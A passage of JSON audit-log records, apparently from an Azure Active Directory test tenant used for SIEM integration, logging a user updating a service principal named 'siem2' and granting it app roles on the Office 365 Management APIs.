"AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, 
"ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", 
"Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": 
"811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": 
"83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, 
{"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"} -{"OrganizationId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 